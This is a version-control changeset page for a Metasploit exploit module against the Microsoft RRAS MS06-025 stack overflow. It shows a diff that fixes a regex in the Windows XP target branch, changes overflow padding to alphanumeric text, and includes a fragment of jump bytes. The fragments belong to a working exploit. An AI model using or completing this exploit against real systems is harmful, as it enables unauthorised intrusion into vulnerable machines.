Changeset 3719
- Timestamp:
- 06/21/06 18:39:53 (2 years ago)
- Files:
-
- framework2/trunk/exploits/rras_ms06_025.pm (modified) (3 diffs)
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework2/trunk/exploits/rras_ms06_025.pm
r3715 r3719 24 24 'Name' => 'Microsoft RRAS MSO6-025 Stack Overflow', 25 25 'Version' => '$Revision: 1.1 $', 26 'Authors' => [ 'anonymous' ], 26 'Authors' => 27 [ 28 'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 29 'H D Moore <hdm [at] metasploit.com>' 30 ], 27 31 28 32 'Arch' => ['x86'], … … 157 161 "\xe9\xb7\xfb\xff\xff" ; 158 162 159 } elsif( $target->[0] = !/Windows XP/) {163 } elsif( $target->[0] =~ /Windows XP/) { 160 164 161 165 $pattern = … … 174 178 175 179 # need to produce an exception 176 my $request = $pattern . ("A" x (0x4000 - length ($pattern)));180 my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern)); 177 181 178 182 my $len = length ($request);
